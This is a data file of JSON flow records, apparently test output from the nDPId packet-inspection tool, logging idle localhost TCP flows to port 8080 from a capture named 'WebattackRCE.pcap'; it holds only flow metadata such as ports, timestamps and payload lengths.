+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
